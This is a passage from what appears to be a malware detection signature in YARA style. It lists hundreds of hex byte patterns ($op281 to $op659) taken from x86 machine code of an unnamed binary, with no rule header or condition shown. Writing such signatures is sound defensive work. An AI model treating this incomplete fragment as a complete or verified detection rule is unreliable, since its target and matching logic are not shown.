    $op281 = { A1 D8 60 44 00 68 14 CE 43 00 53 FF 90 20 03 00 }
    $op282 = { 40 2A 44 00 C7 84 24 B8 }
    $op283 = { 98 E7 42 00 C7 84 24 B4 }
    $op284 = { 39 58 14 EB 34 A1 D8 60 44 00 57 FF 75 F4 56 FF }
    $op285 = { 6C 11 43 00 C7 84 24 BC }
    $op286 = { 57 FF 75 10 56 FF 90 B8 }
    $op287 = { 68 4C 45 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op288 = { 8B 4D FC 8D 04 41 50 FF 75 14 B8 00 10 00 00 2B }
    $op289 = { EC 24 44 00 C7 84 24 F0 }
    $op290 = { 60 52 43 00 C7 84 24 C0 }
    $op291 = { A1 D8 60 44 00 68 00 2A 43 00 57 FF 90 C4 03 00 }
    $op292 = { 48 96 43 00 C7 84 24 8C }
    $op293 = { 33 F6 80 3D C3 60 44 00 00 75 1A A1 D8 60 44 00 }
    $op294 = { 54 E8 42 00 C7 84 24 DC }
    $op295 = { A1 D8 60 44 00 56 53 6A 04 68 F8 90 42 00 FF 90 }
    $op296 = { 55 8B EC 83 E4 F8 81 EC 8C }
    $op297 = { 8B 45 F4 83 C0 04 50 FF 75 08 A1 D8 60 44 00 FF }
    $op298 = { 64 DE 42 00 C7 84 24 F0 }
    $op299 = { C7 81 20 04 00 00 BA 42 41 00 8B 15 B8 90 42 00 }
    $op300 = { 8B 46 04 8B 0D CC 60 44 00 89 88 B4 }
    $op301 = { 68 60 F2 43 00 FF 75 FC FF 91 50 03 00 00 8B 0D }
    $op302 = { 89 43 00 C7 84 24 B4 0A 00 00 0C 89 43 00 C7 84 }
    $op303 = { 68 4C 44 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op304 = { A1 D8 60 44 00 56 53 FF 74 24 18 FF 90 D4 03 00 }
    $op305 = { 89 5D D4 89 7D DC 89 5D E0 89 5D E4 FF 90 14 04 }
    $op306 = { 1C 24 44 00 C7 84 24 A8 }
    $op307 = { 68 64 44 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op308 = { 24 01 43 00 C7 84 24 B4 }
    $op309 = { A1 D8 60 44 00 68 AC CD 43 00 FF 75 F8 FF 90 20 }
    $op310 = { 48 00 43 00 C7 84 24 84 }
    $op311 = { C0 DD 42 00 C7 84 24 C8 }
    $op312 = { 83 C4 1C 80 3D E2 60 44 00 00 74 2C FF 75 0C A1 }
    $op313 = { 8B 45 F8 80 38 03 0F 85 8D }
    $op314 = { 0C 12 43 00 C7 84 24 E8 }
    $op315 = { 18 02 43 00 C7 84 24 F8 }
    $op316 = { 59 B0 01 C9 C3 8B 4C 24 04 8B 51 3A 33 C0 33 C9 }
    $op317 = { 78 97 43 00 C7 84 24 DC }
    $op318 = { 8C 01 43 00 C7 84 24 CC }
    $op319 = { 59 59 83 7D F4 00 75 0C C6 05 C1 60 44 00 00 E9 }
    $op320 = { 50 8D 44 24 54 50 A1 D8 60 44 00 C7 44 24 58 18 }
    $op321 = { 08 43 00 C7 84 24 30 02 00 00 10 08 43 00 C7 84 }
    $op322 = { B4 11 43 00 C7 84 24 D0 }
    $op323 = { 70 96 43 00 C7 84 24 94 }
    $op324 = { D0 96 43 00 C7 84 24 B0 }
    $op325 = { 28 12 43 00 C7 84 24 F0 }
    $op326 = { 89 5C 24 64 89 5C 24 68 FF 90 14 04 00 00 3D 22 }
    $op327 = { 59 33 C0 3B FB 0F 94 C0 5F 5E 5B C9 C3 CC CC CC }
    $op328 = { C9 C3 55 8B EC 83 EC 3C 6A 0F 8D 45 C4 50 FF 75 }
    $op329 = { 5C 29 44 00 C7 84 24 98 }
    $op330 = { FF 75 10 6A 00 FF 75 0C A1 D8 60 44 00 FF 90 B8 }
    $op331 = { FF 75 10 6A 00 FF 75 0C A1 D8 60 44 00 FF 90 B8 }
    $op332 = { 59 B0 01 5F 5E 5B C9 C3 55 8B EC 8B 45 0C 85 C0 }
    $op333 = { 20 E7 42 00 C7 84 24 9C }
    $op334 = { 89 75 DC 89 75 E0 89 75 F4 FF 90 80 03 00 00 8B }
    $op335 = { E4 DC 42 00 C7 84 24 8C }
    $op336 = { A1 D8 60 44 00 56 FF 90 FC 02 00 00 A1 D8 60 44 }
    $op337 = { A1 D8 60 44 00 68 F0 45 44 00 57 FF 50 40 59 59 }
    $op338 = { 59 5F 5E C9 C3 55 8B EC 83 EC 70 53 57 33 DB 33 }
    $op339 = { 20 44 00 C7 84 24 CC 03 00 00 18 20 44 00 C7 84 }
    $op340 = { 89 5D CC 89 4D D0 89 5D D8 89 5D DC FF 90 14 04 }
    $op341 = { 8D 7C 47 02 8D 47 02 59 3B 45 0C 72 9F 43 43 8B }
    $op342 = { 8A 45 FF 59 5B C9 C3 CC 55 8B EC 83 E4 F8 81 EC }
    $op343 = { 8B 46 04 8B 0D C8 60 44 00 89 88 C4 }
    $op344 = { 59 8D 45 EC 50 A1 D8 60 44 00 FF 90 F8 }
    $op345 = { 85 43 00 C7 84 24 98 09 00 00 14 85 43 00 C7 84 }
    $op346 = { 8B 46 3A 03 45 FC 50 A1 D8 60 44 00 FF 90 78 02 }
    $op347 = { 8D 44 24 24 50 FF 74 24 1C A1 D8 60 44 00 FF 90 }
    $op348 = { 30 24 44 00 C7 84 24 B0 }
    $op349 = { 70 00 43 00 C7 84 24 90 }
    $op350 = { 08 24 44 00 C7 84 24 9C }
    $op351 = { 1C 12 43 00 C7 84 24 EC }
    $op352 = { 8B 45 FC 83 38 04 0F 8E E9 }
    $op353 = { F0 2A 44 00 C7 84 24 D0 }
    $op354 = { B0 97 43 00 C7 84 24 F8 }
    $op355 = { 9C DD 42 00 C7 84 24 BC }
    $op356 = { A0 97 43 00 C7 84 24 F0 }
    $op357 = { 59 8D 45 F4 50 56 56 56 8D 45 CC 50 68 3F 00 0F }
    $op358 = { D8 DD 42 00 C7 84 24 D0 }
    $op359 = { 59 FF 75 F8 8B 7D 08 A1 D8 60 44 00 57 FF 90 90 }
    $op360 = { A1 D8 60 44 00 68 80 FD 42 00 57 FF 90 F0 }
    $op361 = { 83 C4 40 FF 75 EC A1 D8 60 44 00 57 68 40 B0 43 }
    $op362 = { CC 23 44 00 C7 84 24 84 }
    $op363 = { 59 50 56 FF 17 A1 D8 60 44 00 83 C4 0C 68 48 53 }
    $op364 = { 83 C4 0C 8B 45 F8 5E 5F 5B C9 C3 8B 54 24 04 56 }
    $op365 = { 3C DE 42 00 C7 84 24 E8 }
    $op366 = { 60 A4 42 00 C7 84 24 D8 }
    $op367 = { 66 8B 4D 0A 66 3B C8 74 C7 46 46 66 83 3E 00 0F }
    $op368 = { 59 59 83 7D FC 00 74 20 68 80 }
    $op369 = { 66 8B D8 0F B7 07 50 A1 D8 60 44 00 FF 90 E8 }
    $op370 = { 66 8B D8 0F B7 07 50 A1 D8 60 44 00 FF 90 E8 }
    $op371 = { FC B0 40 00 C7 81 00 01 00 00 A6 C8 40 00 C7 81 }
    $op372 = { 44 E7 42 00 C7 84 24 A4 }
    $op373 = { 83 C4 28 FF 74 24 18 A1 D8 60 44 00 56 53 FF 90 }
    $op374 = { F8 29 44 00 C7 84 24 AC }
    $op375 = { 78 11 43 00 C7 84 24 C0 }
    $op376 = { 59 FF 75 F8 A1 D8 60 44 00 FF 75 08 FF 90 90 01 }
    $op377 = { 59 FF 75 F8 A1 D8 60 44 00 FF 75 08 FF 90 90 01 }
    $op378 = { 59 FF 44 24 10 83 7C 24 10 04 0F 82 5A FF FF FF }
    $op379 = { 8D 45 EC 50 FF 75 FC A1 D8 60 44 00 FF 90 90 }
    $op380 = { FF 45 F8 8D 47 44 50 A1 D8 60 44 00 FF 90 08 04 }
    $op381 = { FF 45 F8 8D 47 44 50 A1 D8 60 44 00 FF 90 08 04 }
    $op382 = { 44 A4 42 00 C7 84 24 D0 }
    $op383 = { A1 D8 60 44 00 53 8B 5D 08 56 57 68 FE FF 00 00 }
    $op384 = { 08 01 43 00 C7 84 24 AC }
    $op385 = { 8D 47 FC 50 A1 D8 60 44 00 53 FF 50 4C 83 C4 24 }
    $op386 = { BC E7 42 00 C7 84 24 C0 }
    $op387 = { 83 C4 10 EB 09 8D 43 08 81 CE }
    $op388 = { FF 74 24 1C A1 D8 60 44 00 FF 75 08 FF 90 90 01 }
    $op389 = { 89 75 D8 89 75 E4 89 75 E8 FF 90 14 04 00 00 53 }
    $op390 = { 89 45 08 8B 45 C0 83 C4 10 85 C0 74 0D 8B 4F 3A }
    $op391 = { C4 DE 42 00 C7 84 24 00 01 00 00 E0 DE 42 00 C7 }
    $op392 = { 83 C4 18 85 F6 75 07 32 C0 5F 5E 5B C9 C3 8D 46 }
    $op393 = { 44 29 44 00 C7 84 24 94 }
    $op394 = { B0 A4 42 00 C7 84 24 F4 }
    $op395 = { FF 90 38 01 00 00 8D 44 24 2C 89 44 24 58 8D 84 }
    $op396 = { AC 00 43 00 C7 84 24 9C }
    $op397 = { FF 76 04 A1 D8 60 44 00 FF 75 FC 53 68 9C 44 44 }
    $op398 = { B0 10 43 00 C7 84 24 88 }
    $op399 = { D8 59 40 00 C7 81 48 03 00 00 FD 2B 41 00 C7 81 }
    $op400 = { DC A4 42 00 C7 84 24 00 01 00 00 EC A4 42 00 C7 }
    $op401 = { 74 A4 42 00 C7 84 24 DC }
    $op402 = { FF 90 14 04 00 00 85 C0 A1 D8 60 44 00 74 12 FF }
    $op403 = { 21 AB 40 00 C7 41 34 E3 38 41 00 C7 41 7C 83 2B }
    $op404 = { 89 5C 24 40 89 5C 24 44 FF 90 24 04 00 00 59 59 }
    $op405 = { A0 A4 42 00 C7 84 24 F0 }
    $op406 = { 80 96 43 00 C7 84 24 9C }
    $op407 = { 10 24 44 00 C7 84 24 A0 }
    $op408 = { 72 B3 FF 75 F8 A1 D8 60 44 00 FF 75 08 FF 90 90 }
    $op409 = { AC E8 42 00 C7 84 24 F4 }
    $op410 = { 57 8B 7D 08 8D 45 FE 50 8B 45 0C FF 34 B0 A1 D8 }
    $op411 = { 76 43 00 C7 84 24 48 05 00 00 10 76 43 00 C7 84 }
    $op412 = { 89 75 E4 89 75 E8 FF 90 14 04 00 00 3D 22 00 00 }
    $op413 = { 81 7C 24 10 10 27 00 00 0F 8F D8 }
    $op414 = { 80 43 00 C7 84 24 20 08 00 00 08 80 43 00 C7 84 }
    $op415 = { 68 84 44 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op416 = { A8 DD 42 00 C7 84 24 C0 }
    $op417 = { 78 96 43 00 C7 84 24 98 }
    $op418 = { 59 8D 44 00 02 50 56 6A 02 6A 00 8D 45 F0 50 FF }
    $op419 = { 83 C4 0C 83 4B 0C 04 8B 07 5E 5B 5F C9 C3 55 8B }
    $op420 = { 17 44 00 C7 84 24 98 01 00 00 14 17 44 00 C7 84 }
    $op421 = { E8 00 43 00 C7 84 24 A4 }
    $op422 = { D4 11 43 00 C7 84 24 D8 }
    $op423 = { 56 FF 75 14 8B F8 A1 D8 60 44 00 FF 90 90 01 00 }
    $op424 = { E0 51 43 00 C7 84 24 AC }
    $op425 = { 08 A4 42 00 C7 84 24 B8 }
    $op426 = { 59 59 C6 05 C1 60 44 00 00 5F C9 C3 83 7C 24 08 }
    $op427 = { 80 10 43 00 C7 84 24 84 }
    $op428 = { 8B F8 03 FF 8D 47 14 50 FF 75 14 A1 D8 60 44 00 }
    $op429 = { E9 AD FE FF FF A1 D8 60 44 00 53 57 68 50 A0 42 }
    $op430 = { 83 C4 14 8B C6 5E C3 55 8B EC 83 EC 70 33 C0 56 }
    $op431 = { A1 D8 60 44 00 FF 05 00 A0 42 00 53 6A 03 56 FF }
    $op432 = { 89 7D C4 89 7D C8 FF 90 50 01 00 00 85 C0 0F 85 }
    $op433 = { 57 33 FF 39 7D 7C 0F 84 EA 01 00 00 A1 D8 60 44 }
    $op434 = { 94 24 44 00 C7 84 24 D4 }
    $op435 = { 3D 23 00 00 C0 74 0B 3D 05 00 00 80 0F 85 DF }
    $op436 = { 68 E4 40 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op437 = { A1 D8 60 44 00 68 18 46 44 00 57 FF 50 40 59 59 }
    $op438 = { 51 50 A1 D8 60 44 00 FF 90 04 02 00 00 59 59 81 }
    $op439 = { 59 8A C3 EB AA B3 01 EB E8 56 8B 74 24 08 8B 46 }
    $op440 = { 68 68 45 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op441 = { A1 94 90 42 00 89 81 B0 03 00 00 A1 70 90 42 00 }
    $op442 = { A8 97 43 00 C7 84 24 F4 }
    $op443 = { 59 50 56 FF 17 83 C4 0C A1 D8 60 44 00 56 FF 90 }
    $op444 = { 8D 44 24 0C 50 A1 D8 60 44 00 FF 90 F8 }
    $op445 = { 8D 44 24 0C 50 A1 D8 60 44 00 FF 90 F8 }
    $op446 = { 33 DB 3B C3 0F 84 F3 01 00 00 8B 40 10 3B C3 0F }
    $op447 = { 56 8D 44 1B 02 50 FF 75 14 A1 D8 60 44 00 FF 90 }
    $op448 = { 98 97 43 00 C7 84 24 EC }
    $op449 = { 83 C4 30 83 3D 04 61 44 00 05 75 1B A1 D8 60 44 }
    $op450 = { 20 43 00 C7 84 24 D8 04 00 00 10 20 43 00 C7 84 }
    $op451 = { 8B 48 10 3B CB 0F 84 EB }
    $op452 = { 93 43 00 C7 84 24 84 0D 00 00 04 93 43 00 C7 84 }
    $op453 = { 59 3B F3 74 15 E9 43 FF FF FF 8D 45 0C 50 A1 D8 }
    $op454 = { 24 51 43 00 C7 84 24 8C }
    $op455 = { 1C 2C 44 00 C7 84 24 FC }
    $op456 = { 83 C4 18 85 C0 74 0C C7 46 10 01 }
    $op457 = { 59 8B C6 5F 5E C9 C3 55 8B EC 51 A1 D8 60 44 00 }
    $op458 = { 83 C4 0C 6A 0A 83 C7 10 57 56 8D 45 EC 50 FF 75 }
    $op459 = { FF 44 24 10 8D 47 44 50 A1 D8 60 44 00 FF 90 08 }
    $op460 = { 8B 45 FC 8B 00 8D 44 00 02 50 FF 75 08 A1 D8 60 }
    $op461 = { 6A 01 FF 75 AC FF 75 F4 6A 00 FF 75 0C A1 D8 60 }
    $op462 = { 89 74 24 74 89 74 24 78 FF 90 14 04 00 00 85 C0 }
    $op463 = { 89 74 24 74 89 74 24 78 FF 90 14 04 00 00 85 C0 }
    $op464 = { E4 96 43 00 C7 84 24 B8 }
    $op465 = { 8B D8 83 C4 18 85 DB 0F 84 0C 01 00 00 A1 D8 60 }
    $op466 = { 3B 05 08 61 44 00 75 1B 8B 46 04 FF 80 B8 }
    $op467 = { 19 43 00 C7 84 24 C4 02 00 00 0C 19 43 00 C7 84 }
    $op468 = { D0 51 43 00 C7 84 24 A8 }
    $op469 = { 48 51 43 00 C7 84 24 94 }
    $op470 = { C8 11 43 00 C7 84 24 D4 }
    $op471 = { FF 75 F4 A1 D8 60 44 00 68 C8 43 44 00 56 FF 75 }
    $op472 = { F4 51 43 00 C7 84 24 B0 }
    $op473 = { 50 A1 D8 60 44 00 51 FF 90 04 02 00 00 83 65 08 }
    $op474 = { 16 44 00 C7 84 24 4C 01 00 00 0C 16 44 00 C7 84 }
    $op475 = { 83 C4 18 8D 44 24 20 50 A1 D8 60 44 00 FF 90 B8 }
    $op476 = { 54 A4 42 00 C7 84 24 D4 }
    $op477 = { A4 E7 42 00 C7 84 24 B8 }
    $op478 = { A1 D8 60 44 00 68 E8 29 43 00 57 FF 90 C4 03 00 }
    $op479 = { A1 D8 60 44 00 68 20 12 44 00 56 FF 90 F0 }
    $op480 = { A1 D8 60 44 00 68 20 2A 43 00 57 FF 90 C4 03 00 }
    $op481 = { 6C 53 43 00 C7 84 24 E8 }
    $op482 = { 59 A1 D8 60 44 00 53 FF 75 08 FF 90 90 01 00 00 }
    $op483 = { 59 FF 44 24 14 81 7C 24 14 AF 01 00 00 0F 82 76 }
    $op484 = { 2C 97 43 00 C7 84 24 C8 }
    $op485 = { C7 43 0C 20 02 00 00 89 5D F0 FF 90 C0 03 00 00 }
    $op486 = { A1 38 90 42 00 89 81 60 02 00 00 A1 C0 90 42 00 }
    $op487 = { 59 3B FE 74 15 A1 D8 60 44 00 53 FF 75 08 FF 90 }
    $op488 = { 83 C4 0C 5F 8A C3 5E E9 E7 FE FF FF 55 8B EC 53 }
    $op489 = { D0 DC 42 00 C7 84 24 84 }
    $op490 = { FF 90 A8 03 00 00 F7 D8 1B C0 F7 D0 23 45 FC 5F }
    $op491 = { 80 00 43 00 C7 84 24 94 }
    $op492 = { 51 50 A1 D8 60 44 00 FF 90 04 02 00 00 83 65 08 }
    $op493 = { 59 33 C0 3B FE 5F 5E 0F 94 C0 5B C9 C3 55 8B EC }
    $op494 = { 39 35 04 61 44 00 0F 85 9B }
    $op495 = { 83 C4 0C 32 C0 EB DB 83 7C 24 04 00 75 03 33 C0 }
    $op496 = { 68 80 2C 43 00 FF 75 F0 57 FF 90 2C 03 00 00 83 }
    $op497 = { 8B 4F 08 98 8D 04 85 04 }
    $op498 = { 98 A4 42 00 C7 84 24 EC }
    $op499 = { AC 24 44 00 C7 84 24 DC }
    $op500 = { 30 E7 42 00 C7 84 24 A0 }
    $op501 = { 89 5D B0 89 5D B4 FF 90 14 04 00 00 BF 34 00 00 }
    $op502 = { 59 33 C0 39 5D 0C 5F 5E 0F 94 C0 5B C9 C3 55 8B }
    $op503 = { 59 33 C0 39 5D 0C 5F 5E 0F 94 C0 5B C9 C3 55 8B }
    $op504 = { 83 C4 0C 56 56 56 6A 01 6A 07 53 56 8D 45 F4 50 }
    $op505 = { 83 C4 0C 56 56 56 6A 01 6A 07 53 56 8D 45 F4 50 }
    $op506 = { 84 29 44 00 C7 84 24 A0 }
    $op507 = { A1 D8 60 44 00 56 68 00 10 00 00 FF 75 08 FF 90 }
    $op508 = { 87 43 00 C7 84 24 28 0A 00 00 0C 87 43 00 C7 84 }
    $op509 = { 59 A1 D8 60 44 00 56 FF 90 3C 02 00 00 A1 D8 60 }
    $op510 = { 33 C0 66 89 44 24 2C 8D 7C 24 2E AB 66 AB 68 40 }
    $op511 = { 70 2B 44 00 C7 84 24 E0 }
    $op512 = { 59 8A C3 EB AA B3 01 EB E8 55 8B EC 83 EC 44 56 }
    $op513 = { E0 10 43 00 C7 84 24 94 }
    $op514 = { 83 C4 0C 5F 5E 5B C9 C3 CC CC 55 8B EC 83 EC 20 }
    $op515 = { 83 C4 1C EB C3 33 C0 8B 4C 24 04 3B 88 08 92 42 }
    $op516 = { FF 05 00 A0 42 00 38 1D EA 60 44 00 74 0D A1 D8 }
    $op517 = { 64 00 43 00 C7 84 24 8C }
    $op518 = { 60 11 43 00 C7 84 24 B8 }
    $op519 = { 89 5D DC 89 5D E0 FF 90 14 04 00 00 85 C0 0F 85 }
    $op520 = { 89 5D DC 89 5D E0 FF 90 14 04 00 00 85 C0 0F 85 }
    $op521 = { B8 24 44 00 C7 84 24 E0 }
    $op522 = { 89 5C 24 64 89 5C 24 68 FF 90 14 04 00 00 85 C0 }
    $op523 = { FF 74 24 14 A1 D8 60 44 00 FF 74 24 14 FF 90 00 }
    $op524 = { C4 10 43 00 C7 84 24 8C }
    $op525 = { 5F 85 C0 74 06 33 C0 33 D2 C9 C3 8B 45 E8 8B 55 }
    $op526 = { 90 97 43 00 C7 84 24 E8 }
    $op527 = { 4C 27 41 00 C7 81 A4 03 00 00 87 09 41 00 C7 81 }
    $op528 = { 88 E8 42 00 C7 84 24 EC }
    $op529 = { 59 83 F8 02 76 69 A1 D8 60 44 00 53 68 FE FF 00 }
    $op530 = { 83 C4 18 89 45 8C 83 7D 8C 00 0F 84 07 04 00 00 }
    $op531 = { A1 D8 60 44 00 8D 5E 0C 68 28 C6 43 00 53 FF 90 }
    $op532 = { FF 75 08 A1 D8 60 44 00 FF 73 08 FF 90 AC 03 00 }
    $op533 = { 66 83 79 38 02 0F 86 D5 }
    $op534 = { 94 DD 42 00 C7 84 24 B8 }
    $op535 = { 83 C4 14 C6 04 37 00 8B C7 5F 5E C3 56 8B 74 24 }
    $op536 = { 83 C4 0C 3B FB 0F 94 C0 5E 5F 5B C9 C3 55 8B EC }
    $op537 = { A1 D8 60 44 00 56 57 BE FF 7F 00 00 56 FF 75 08 }
    $op538 = { A1 D8 60 44 00 56 57 BE FF 7F 00 00 56 FF 75 08 }
    $op539 = { 68 A4 45 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op540 = { 0F 82 60 FF FF FF A1 D8 60 44 00 68 20 21 44 00 }
    $op541 = { 8B 45 FC 8D 04 86 03 43 3A 50 A1 D8 60 44 00 FF }
    $op542 = { 84 24 44 00 C7 84 24 D0 }
    $op543 = { F0 11 43 00 C7 84 24 E0 }
    $op544 = { 0C 97 43 00 C7 84 24 C0 }
    $op545 = { 28 2A 44 00 C7 84 24 B4 }
    $op546 = { 83 C8 FF E9 5C 01 00 00 83 65 08 00 8D 45 08 50 }
    $op547 = { 7C 52 43 00 C7 84 24 C8 }
    $op548 = { 34 52 43 00 C7 84 24 BC }
    $op549 = { D8 E6 42 00 C7 84 24 8C }
    $op550 = { 98 11 43 00 C7 84 24 C8 }
    $op551 = { 68 B8 40 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op552 = { 7C E8 42 00 C7 84 24 E8 }
    $op553 = { 8B 0D D8 60 44 00 53 66 89 45 0A FF 91 E8 }
    $op554 = { 59 8D 44 00 02 50 FF 75 10 8D 45 F4 6A 02 6A 00 }
    $op555 = { 59 8D 44 00 02 50 FF 75 10 8D 45 F4 6A 02 6A 00 }
    $op556 = { 20 DE 42 00 C7 84 24 E0 }
    $op557 = { 59 80 3D E2 60 44 00 00 74 43 A1 D8 60 44 00 57 }
    $op558 = { 8B 45 08 8B 50 18 3B CA 0F 82 27 01 00 00 8B 40 }
    $op559 = { 83 C4 1C A1 D8 60 44 00 53 FF 75 08 FF 90 90 01 }
    $op560 = { 1C 01 43 00 C7 84 24 B0 }
    $op561 = { E9 86 FE FF FF A1 D8 60 44 00 53 57 68 5C A0 42 }
    $op562 = { D4 53 43 00 C7 84 24 F8 }
    $op563 = { 0C A3 42 00 C7 84 24 88 }
    $op564 = { 8B 7D 0C EB 25 50 A1 D8 60 44 00 FF 90 E8 }
    $op565 = { 8B 5D FC 3B DE 75 05 39 75 F4 74 7B 33 C0 3B DE }
    $op566 = { 59 8D 44 00 02 89 45 F4 FF 75 08 A1 D8 60 44 00 }
    $op567 = { 8B 48 04 89 45 F8 B8 00 10 00 00 83 C4 0C 39 45 }
    $op568 = { FF 75 0C 50 A1 D8 60 44 00 FF 90 C4 03 00 00 59 }
    $op569 = { 81 7C 24 14 10 27 00 00 0F 8F CC }
    $op570 = { FF 75 E8 A1 D8 60 44 00 FF 75 EC FF 75 08 FF 50 }
    $op571 = { A1 A8 90 42 00 89 81 8C 02 00 00 A1 DC 90 42 00 }
    $op572 = { 24 A3 42 00 C7 84 24 8C }
    $op573 = { 28 52 43 00 C7 84 24 B8 }
    $op574 = { 84 51 43 00 C7 84 24 9C }
    $op575 = { A1 D8 60 44 00 33 DB 53 68 38 23 44 00 68 58 23 }
    $op576 = { 34 11 43 00 C7 84 24 AC }
    $op577 = { F0 DC 42 00 C7 84 24 90 }
    $op578 = { 68 88 45 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op579 = { 8B 44 24 24 83 C0 04 50 FF 75 08 E8 30 BF FF FF }
    $op580 = { 83 C4 18 03 C0 50 FF 75 EC 8B 45 E8 53 FF 10 50 }
    $op581 = { FF 90 48 02 00 00 5F 85 C0 74 04 32 C0 C9 C3 8B }
    $op582 = { FF 90 A0 03 00 00 8B F0 8D 45 FC 50 A1 D8 60 44 }
    $op583 = { 59 A1 D8 60 44 00 6A 04 68 DC B3 43 00 68 E8 B3 }
    $op584 = { 5C 97 43 00 C7 84 24 D4 }
    $op585 = { 70 01 43 00 C7 84 24 C0 }
    $op586 = { 6A 22 8D 45 EC 50 FF 75 7C A1 D8 60 44 00 C7 45 }
    $op587 = { 8B 55 FC 8B 4F 3A 05 00 F0 FF FF 83 C4 10 FF 45 }
    $op588 = { D8 29 44 00 C7 84 24 A8 }
    $op589 = { C7 81 28 01 00 00 20 CA 40 00 C7 81 18 03 00 00 }
    $op590 = { 83 C4 0C 8D 45 DC 50 68 00 01 04 00 8D 45 FC 50 }
    $op591 = { E4 E7 42 00 C7 84 24 C8 }
    $op592 = { 89 5D E0 89 5D E4 FF 90 14 04 00 00 8B F8 81 FF }
    $op593 = { 59 59 85 C0 75 E3 8B 45 E0 89 46 28 8B 46 08 FF }
    $op594 = { A1 D8 60 44 00 83 C4 48 FF 76 04 FF 75 FC 53 68 }
    $op595 = { DC 96 43 00 C7 84 24 B4 }
    $op596 = { 68 48 F2 43 00 FF 75 FC FF 91 50 03 00 00 8B 0D }
    $op597 = { 51 53 50 A1 D8 60 44 00 57 FF 90 70 01 00 00 8B }
    $op598 = { B8 E8 42 00 C7 84 24 F8 }
    $op599 = { 14 A4 42 00 C7 84 24 BC }
    $op600 = { 68 9C 44 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op601 = { 7E 43 00 C7 84 24 84 07 00 00 08 7E 43 00 C7 84 }
    $op602 = { 3C 96 43 00 C7 84 24 88 }
    $op603 = { 94 DE 42 00 C7 84 24 F8 }
    $op604 = { 50 A1 D8 60 44 00 53 56 FF 90 0C 04 00 00 FF 75 }
    $op605 = { 3E 83 41 00 C7 81 40 01 00 00 6A 66 41 00 C7 81 }
    $op606 = { 60 E8 42 00 C7 84 24 E0 }
    $op607 = { 79 FE 40 00 A1 04 90 42 00 89 81 00 03 00 00 C7 }
    $op608 = { 7C A3 42 00 C7 84 24 9C }
    $op609 = { FF 90 14 04 00 00 3D 22 00 00 C0 75 40 8D 44 24 }
    $op610 = { 68 97 43 00 C7 84 24 D8 }
    $op611 = { 58 24 44 00 C7 84 24 C0 }
    $op612 = { 83 C4 10 A1 D8 60 44 00 57 56 FF 74 24 1C FF 90 }
    $op613 = { 83 C4 28 FF 74 24 0C A1 D8 60 44 00 56 53 FF 90 }
    $op614 = { A1 D8 60 44 00 68 C8 21 44 00 56 FF 90 F0 }
    $op615 = { 89 75 E4 89 75 E8 89 75 FC FF 90 14 04 00 00 85 }
    $op616 = { 68 AC 41 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op617 = { 50 A1 D8 60 44 00 FF 90 04 03 00 00 84 C0 A1 D8 }
    $op618 = { FF 90 24 04 00 00 59 59 8D 45 E0 50 A1 D8 60 44 }
    $op619 = { 89 75 EC 89 75 F0 FF 90 A8 03 00 00 5F 5E 85 C0 }
    $op620 = { 89 75 EC 89 75 F0 FF 90 A8 03 00 00 5F 5E 85 C0 }
    $op621 = { 83 C4 14 85 C0 74 0C C7 46 10 03 }
    $op622 = { 85 C0 74 05 83 C8 FF EB 08 8B 45 E8 89 46 14 33 }
    $op623 = { 50 DD 42 00 C7 84 24 A4 }
    $op624 = { 89 5D BC 89 5D FC FF 90 80 03 00 00 3B C3 0F 84 }
    $op625 = { C4 52 43 00 C7 84 24 D4 }
    $op626 = { F8 50 43 00 C7 84 24 84 }
    $op627 = { C0 E6 42 00 C7 84 24 84 }
    $op628 = { A4 01 43 00 C7 84 24 D4 }
    $op629 = { B4 E7 42 00 C7 84 24 BC }
    $op630 = { A1 D8 60 44 00 57 FF 75 08 FF 90 90 01 00 00 8B }
    $op631 = { 33 FF 83 C4 10 3B C7 74 3B 8B 5B 3A 8B 4D 0C 03 }
    $op632 = { A1 9C 90 42 00 C7 81 00 02 00 00 8D 9D 41 00 C7 }
    $op633 = { 68 A8 40 00 C7 81 2C 04 00 00 8A 5B 41 00 C7 81 }
    $op634 = { 6A 06 BF 10 F3 43 00 57 89 4D F0 FF 90 40 02 00 }
    $op635 = { FC 24 44 00 C7 84 24 F4 }
    $op636 = { 59 59 83 7D F8 00 75 05 E9 82 }
    $op637 = { 08 2B 44 00 C7 84 24 D4 }
    $op638 = { 33 C0 3B FB 59 0F 94 C0 5F 5E 5B C9 C3 55 8B EC }
    $op639 = { A8 A3 42 00 C7 84 24 A4 }
    $op640 = { 08 DE 42 00 C7 84 24 DC }
    $op641 = { 28 DD 42 00 C7 84 24 9C }
    $op642 = { D4 24 44 00 C7 84 24 E8 }
    $op643 = { 59 33 FF EB 1F FF 75 10 0F B7 45 0C 50 A1 D8 60 }
    $op644 = { A1 D8 60 44 00 57 FF 75 08 FF 90 90 01 00 00 83 }
    $op645 = { A1 D8 60 44 00 57 FF 75 08 FF 90 90 01 00 00 83 }
    $op646 = { E4 A3 42 00 C7 84 24 B0 }
    $op647 = { FF 75 18 FF 75 14 57 53 FF 90 B0 }
    $op648 = { 1C A4 42 00 C7 84 24 C0 }
    $op649 = { 8D 85 00 FE FF FF 68 98 69 43 00 68 FF }
    $op650 = { A3 59 40 00 C7 81 44 04 00 00 14 86 41 00 C7 81 }
    $op651 = { 59 8B 06 85 C0 74 0E 50 FF 76 08 E8 B7 FF FF FF }
    $op652 = { A1 D8 60 44 00 56 FF 90 68 01 00 00 A1 D8 60 44 }
    $op653 = { 89 74 24 68 89 74 24 6C FF 90 50 01 00 00 85 C0 }
    $op654 = { F8 01 43 00 C7 84 24 EC }
    $op655 = { 83 C4 0C EB 2A FF 73 08 50 8D 47 14 50 A1 D8 60 }
    $op656 = { 83 C4 10 84 DB 75 10 A1 D8 60 44 00 68 2C FE 42 }
    $op657 = { 8B 45 0C FF 74 24 14 66 83 78 02 3F 50 A1 D8 60 }
    $op658 = { 24 E8 42 00 C7 84 24 D4 }
    $op659 = { 59 5F 5E 8A C3 5B C9 C3 55 8B EC 83 EC 1C A1 D8 }
